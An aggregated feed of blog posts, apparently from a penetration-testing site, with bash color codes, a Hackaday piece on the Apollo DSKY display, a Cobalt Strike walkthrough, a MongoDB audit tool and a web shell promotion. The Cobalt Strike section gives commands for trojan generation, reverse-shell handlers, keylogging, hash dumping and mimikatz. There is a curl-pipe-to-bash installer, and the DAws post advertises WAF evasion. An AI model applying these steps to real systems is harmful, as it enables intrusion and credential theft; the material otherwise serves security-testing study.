Give the output of the bash shell with color – Penetration Testing in Linux

When a script produces a lot of output, highlighting the important lines in color makes the output friendlier to read.

Text color

For example, to print hello in red on the console, run the following command:

echo -e "\033[31mhello\033[0m"

\033[31m switches the display color of the following characters to red

\033[0m switches the display color back to normal

Notice that the leading \033[ and the trailing m are the same in both; only the number in the middle differs, and that number selects the color to display. The numbers mean:

Code  Color
30    black
31    red
32    green
33    light red
34    blue
35    purple
36    light blue
37    gray

Background color

Background colors work exactly like foreground colors; only the numbers differ:

Code  Color
40    black
41    red
42    green
43    light red
44    blue
45    purple
46    light blue
47    gray

To set the foreground and background color at the same time, for example red text on a green background, separate the two numbers with a semicolon:

echo -e "\033[31;42mhello\033[0m"
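As an added example, not from the original post, here is a small POSIX sh helper that puts the codes above to work, adds a terminal check so colors never end up in redirected log files, and a strip function for text you do not control; the function names color_text, strip_ansi and log are my own:

```shell
#!/bin/sh
# Added example (not from the original post): helpers around the
# escape sequences described above. The codes are the numbers from
# the two tables: 30-37 foreground, 40-47 background, 0 resets.
ESC=$(printf '\033')

# color_text FG BG TEXT -> TEXT wrapped in ESC[FG;BGm ... ESC[0m.
# Pass an empty BG to set only the foreground color.
color_text() {
    fg="$1"; bg="$2"; text="$3"
    if [ -n "$bg" ]; then
        printf '%s[%s;%sm%s%s[0m' "$ESC" "$fg" "$bg" "$text" "$ESC"
    else
        printf '%s[%sm%s%s[0m' "$ESC" "$fg" "$text" "$ESC"
    fi
}

# strip_ansi TEXT -> TEXT with color sequences (ESC [ digits m) removed.
# Run it over output before writing a log file, and over untrusted strings
# (anything read from a target) so they cannot smuggle in their own codes.
strip_ansi() {
    printf '%s' "$1" | sed "s/$ESC\\[[0-9;]*m//g"
}

# log LEVEL MESSAGE... -> colored only when stdout is a terminal, so
# redirected output (./scan.sh > out.log) stays free of escape codes.
log() {
    level="$1"; shift
    case "$level" in
        ok)   code=32 ;;  # green
        warn) code=33 ;;
        err)  code=31 ;;  # red
        *)    code=0 ;;
    esac
    if [ -t 1 ]; then
        color_text "$code" "" "[$level]"; printf ' %s\n' "$*"
    else
        printf '[%s] %s\n' "$level" "$*"
    fi
}

log ok "scan finished"
log err "host unreachable"
color_text 31 42 hello; printf '\n'   # red text on a green background
```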

The post Give the output of the bash shell with color appeared first on Penetration Testing in Linux. http://ift.tt/2rzDSCU http://ift.tt/2aM8QhC

Re-Creating the Apollo DSKY’s Display

Apollo astronauts used the DSKY (Display-Keyboard) to interact with the flight computer with a series of 2-digit codes punched into a numeric keypad. Above the keyboard was a high voltage electroluminescent (EL) display whose segments were driven by electromechanical relays; old-ass technology not seen in operation in decades.

[Fran Blanche] is working to re-create the DSKY’s display, and is raising funds to make her first prototype. She was actually able to go dismantle a real DSKY at the Smithsonian, and this drove her desire to re-create the DSKY’s unusual display.

As [Fran] points out in her video, cinematic re-creations typically involve LED displays and CGI rather than the authentic EL 7-segs. Who would want that when you could have the original?

The DSKY is one of the most recognizable and historically relevant parts of the Apollo Command Module and it’s also quite rare. There are only a handful of them around and of course none of them work. [Fran]’s display could help museums, collectors — and yes, moviemakers — re-create DSKYs with greater authenticity.

[Fran] is a good friend of Hackaday. If you missed her Hack Chat on antiquated technology last Friday you can check out the transcript here.

Filed under: chemistry hacks, classic hacks http://ift.tt/2quaCNS http://ift.tt/2aM8QhC

Introduction Cobalt Strike,cobalt strike walkthrough

Introduction to Cobalt Strike

Cobalt Strike is a GUI penetration-testing framework originally built on Metasploit. It integrates port forwarding, service scanning, automated exploitation, multi-mode port listening, generation of Windows EXE Trojans, Windows DLL Trojans, Java Trojans and Office macro viruses, and Trojan binding; its phishing features include site cloning, target information gathering, Java applet execution, automated browser attacks and so on. Since version 3.0, Cobalt Strike no longer uses the Metasploit framework and runs as a standalone platform, though it can still be used together with Armitage.

Cobalt Strike Usage

1. On the team server, run the server:

./teamserver 10.0.0.88 backlion   # team server IP 10.0.0.88, password backlion

2. On the client, start Cobalt Strike and connect to the team server:

On Windows:

java -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar

On Linux:

./cobaltstrike

Host: 10.0.0.88, port: 50050, user name: any, password: backlion

3. Create a local monitor listen:

Cobalt Strike -> Listeners, then click Add to create your own listener. Cobalt Strike 3.6 includes:

· windows/beacon_dns/reverse_dns_txt

· windows/beacon_dns/reverse_http

· windows/beacon_http/reverse_http

· windows/beacon_https/reverse_https

· windows/beacon_smb/bind_pipe

· windows/foreign/reverse_dns_txt

· windows/foreign/reverse_http

· windows/foreign/reverse_https

· windows/foreign/reverse_tcp

windows/beacon_* are Cobalt Strike's own listeners, covering DNS, HTTP, HTTPS and SMB; windows/foreign_* are external listeners, that is, msf or Armitage listeners. Once a listener type is selected, the host field is filled in automatically with the IP the client was started with; set the listening port and save the listener.

4. Attack module introduction

With the listener in place, the client-side payload is configured next. Cobalt Strike includes several attack types; the Packages menu contains the following:

HTML Application generates a malicious HTA Trojan file;

MS Office Macro generates an Office macro virus file;

Payload Generator generates the payload for various languages;

USB / CD AutoPlay generates Trojan files that run via AutoPlay;

Windows Dropper bundles the payload with a document file;

Windows Executable generates an executable EXE Trojan;

Windows Executable (S) generates a stageless executable EXE Trojan.

Web Drive-by includes the following modules:

Manage: manage the web services that are currently hosted;

Clone Site: clone a site and record the data the victim submits;

Host File: serve a file for download; the MIME type can be modified;

Scripted Web Delivery: similar to msf's web_delivery;

Signed Applet Attack: phishing with a self-signed Java applet;

Smart Applet Attack: detects the Java version automatically and attacks it; works against Java 1.6.0_45 and Java 1.7.0_21;

System Profiler: collects system information such as the OS version, Flash version and browser version.

Spear Phish is the module for sending mail.

5. View module introduction

The View menu lets the tester look at the various modules; the graphical interface makes the victim machines' information easy to see.

Applications shows the applications on the victim machine;

Credentials shows the credentials collected from the victim machine, which is convenient for later stages;

Downloads: downloaded files;

Event Log shows the event log, so system events are clearly visible, and the team can chat here;

Keystrokes: view keylogger output;

Proxy Pivots: view proxy information;

Screenshots: screenshot function;

Script Console: load enhancement scripts here; the scripts are Cortana scripts (cortana-script);

Targets: view the targets;

Web Log: view the web log.

6. Reporting module introduction

Activity Report: activity report generation

Hosts Report: host report

Indicators of Compromise: IoC report

Sessions Report: session report

Social Engineering Report

7. Using the Beacon module

7.0 Generate an EXE backdoor

Attacks -> Packages -> Windows Executable generates a Windows EXE backdoor, as shown below:

7.1 Upload the generated backdoor artifact.exe to the victim host and execute it

The victim host then calls back to Cobalt Strike with a shell; click on the victim's machine in the list.

7.2 Click the victim host that called back and choose Interact; this opens the beacon console

7.3 The shell command of the beacon module

Beacon> help shell

Beacon> shell ifconfig

Beacon> shell whoami

Beacon> shell net user

7.4 The beacon browserpivot command

browserpivot injects into the victim's browser process and opens an HTTP proxy, after which you can log on to the victim's sites:

Beacon> ps   # find the browser process; here its PID is 2396

Beacon> browserpivot 2396   # inject into the process and open the HTTP proxy; proxy server 10.0.0.88:62243

Set the local browser's HTTP proxy to host 10.0.0.88, type HTTP, port 62243.

Beacon> browserpivot stop   # stop the proxy

7.5 The beacon module SOCKS command

Select the victim host, then right-click Pivoting -> SOCKS Server to open a SOCKS proxy through this host.

Configure the proxychains configuration file on Kali:

vim /etc/proxychains.conf

Change socks4 127.0.0.1 9050 to: socks4 127.0.0.1 26370

proxychains firefox-esr   # reach the compromised host's intranet through the SOCKS proxy

Beacon> socks stop   # close the SOCKS proxy

7.6 Screenshot and keylogger in the beacon module

Beacon> screenshot   # take a screenshot

Then open View -> Screenshots to see it.

Beacon> ps   # list the system processes and pick any process PID

Beacon> keylogger 2640   # inject the keylogger into that process

Open View -> Keystrokes to see the keyboard record.

7.7 The beacon module powershell-import command

Beacon> powershell-import   # import PowerShell scripts; the nishang modules can be imported here

Beacon> powershell powershell_script_name

or

Beacon> powershell Check-VM

7.8 Using Cobalt Strike together with msf

1. Run the following under msf:

msf> use exploit/multi/handler

msf exploit(handler)> set payload windows/meterpreter/reverse_tcp

msf exploit(handler)> set lhost 192.168.1.100

msf exploit(handler)> set lport 4444

msf exploit(handler)> exploit

2. In Cobalt Strike, first add a listener named msf with payload windows/foreign/reverse_tcp and listening port 4444

3. Select the victim host, then right-click -> Spawn

4. A meterpreter session is then received in msf:

7.9 Beacon password module

Beacon> sleep 0   # show results quickly

Beacon> wdigest   # read the information

Beacon> hashdump   # dump account password hashes; requires sufficient privileges; right-click victim host -> Access -> hashdump

Beacon> logonpasswords   # run mimikatz; right-click victim host -> Run Mimikatz

Cobalt Strike Summary

Cobalt Strike's features are exceptionally powerful, and with a graphical interface on top of MSF the operation is more intuitive and automated attacks are more convenient, which helps in penetration tests.

The post Introduction to Cobalt Strike appeared first on Penetration Testing in Linux. http://ift.tt/2qtKL8E http://ift.tt/2aM8QhC

MongoDB auditing pentesting,penetration testing,mongodb penetration testing

mongoaudit is a CLI tool for auditing MongoDB servers, detecting poor security settings and performing automated penetration testing.

It is widely known that there are quite a few holes in MongoDB’s default configuration settings. This fact, combined with abundant lazy system administrators and developers, has led to what the press has called the MongoDB apocalypse.

mongoaudit not only detects misconfigurations, known vulnerabilities and bugs but also gives you advice on how to fix them, recommends best practices and teaches you how to DevOp like a pro!

Supported tests

Server only accepts connections from whitelisted hosts / networks

MongoDB HTTP status interface is not accessible on port 28017

MongoDB is not exposing its version number

MongoDB version is newer than 2.4

TLS/SSL encryption is enabled

Authentication is enabled

SCRAM-SHA-1 authentication method is enabled

Server-side Javascript is forbidden *

Roles granted to the user only permit CRUD operations *

MongoDB listens on a port different to default one

The user has permissions over a single database *

Security bug CVE-2015-7882

Security bug CVE-2015-2705

Security bug CVE-2014-8964

Security bug CVE-2015-1609

Security bug CVE-2014-3971

Security bug CVE-2014-2917

Security bug CVE-2013-4650

Security bug CVE-2013-3969

Security bug CVE-2012-6619

Security bug CVE-2013-1892

Security bug CVE-2013-2132
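As an added example (not mongoaudit's own code) of what several of these tests look for on the server side, here is a line-based check of a mongod.conf against five of them; it assumes the 3.x-era net.ssl.mode key, matches keys by name without following YAML nesting, and uses a constructed weak config and its hardened counterpart:

```shell
#!/bin/sh
# Added example (not part of mongoaudit): a line-based check of a mongod.conf
# against five of the settings in the supported-tests list. It matches keys by
# name on a single line, so it does not follow YAML nesting.
# Prints one FAIL line per weak setting and returns the number of FAILs.
check_mongod_conf() {
    conf="$1"; fails=0
    # security.authorization: enabled ("Authentication is enabled")
    if ! grep -Eq '^[[:space:]]*authorization:[[:space:]]*enabled' "$conf"; then
        echo "FAIL: authentication is not enabled"; fails=$((fails + 1)); fi
    # security.javascriptEnabled: false ("Server-side Javascript is forbidden")
    if ! grep -Eq '^[[:space:]]*javascriptEnabled:[[:space:]]*false' "$conf"; then
        echo "FAIL: server-side JavaScript is allowed"; fails=$((fails + 1)); fi
    # net.ssl.mode: requireSSL, the 3.x key ("TLS/SSL encryption is enabled")
    if ! grep -Eq '^[[:space:]]*mode:[[:space:]]*requireSSL' "$conf"; then
        echo "FAIL: TLS/SSL is not required"; fails=$((fails + 1)); fi
    # net.bindIp set and not 0.0.0.0 ("only accepts connections from whitelisted hosts")
    if ! grep -Eq '^[[:space:]]*bindIp:' "$conf" \
        || grep -Eq '^[[:space:]]*bindIp:[[:space:]]*0\.0\.0\.0' "$conf"; then
        echo "FAIL: bound to all interfaces"; fails=$((fails + 1)); fi
    # net.port other than 27017 ("listens on a port different to default one")
    if grep -Eq '^[[:space:]]*port:[[:space:]]*27017([^0-9]|$)' "$conf"; then
        echo "FAIL: listening on the default port 27017"; fails=$((fails + 1)); fi
    return "$fails"
}

# Constructed sample configs: a weak one and its hardened counterpart.
WEAK_CONF='net:
  port: 27017
  bindIp: 0.0.0.0
security:
  authorization: disabled'
HARDENED_CONF='net:
  port: 27018
  bindIp: 127.0.0.1
  ssl:
    mode: requireSSL
security:
  authorization: enabled
  javascriptEnabled: false'

# audit_sample CONFIG_TEXT -> write it to a temp file, run the check, return the FAIL count.
audit_sample() {
    f=$(mktemp); printf '%s\n' "$1" > "$f"
    check_mongod_conf "$f"; rc=$?
    rm -f "$f"; return "$rc"
}
audit_sample "$WEAK_CONF" || echo "weak sample: $? finding(s)"      # 5
audit_sample "$HARDENED_CONF" && echo "hardened sample: no findings"
```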

Installation

Installing with pip:
pip install mongoaudit

Alternative installer
curl -s http://ift.tt/2l037ax | bash

Source

http://ift.tt/2kukY9n

The post mongoaudit | powerful MongoDB auditing and pentesting tool appeared first on Penetration Testing in Linux. http://ift.tt/2relBrQ http://ift.tt/2aM8QhC

DAws: Advanced Web Shell,php webshell access,php web shell github,php webshell generic backdoor

There are multiple things that make DAws better than every other web shell out there:

Bypasses security systems (IPS, WAFs, etc.) like Suhosin (uses up to 20 PHP functions just to get a command executed).

Drops CGI shells and communicates with them to bypass security systems.

Uses the SSH authorized keys method to bypass security systems.

Uses Shellshock in 2 ways to bypass security systems.

Is completely POST based and uses XOR encryption with a random key generated for every new session, plus private base64 functions, to bypass security systems.

Supports Windows and Linux.

Finds a writable and readable directory and moves there if it's a web directory; DAws outputs everything in that directory.

Drops a php.ini and a .htaccess file that clear all disablers in case "suphp" is installed.

Has an advanced File Manager.

Everything is done automatically so there’s nothing for the user to worry about.

Open Source.

and much more (check the source for more information; everything is well commented)

Download

The post DAws: Advanced Web Shell appeared first on Penetration Testing in Linux. http://ift.tt/2qtTYhq http://ift.tt/2aM8QhC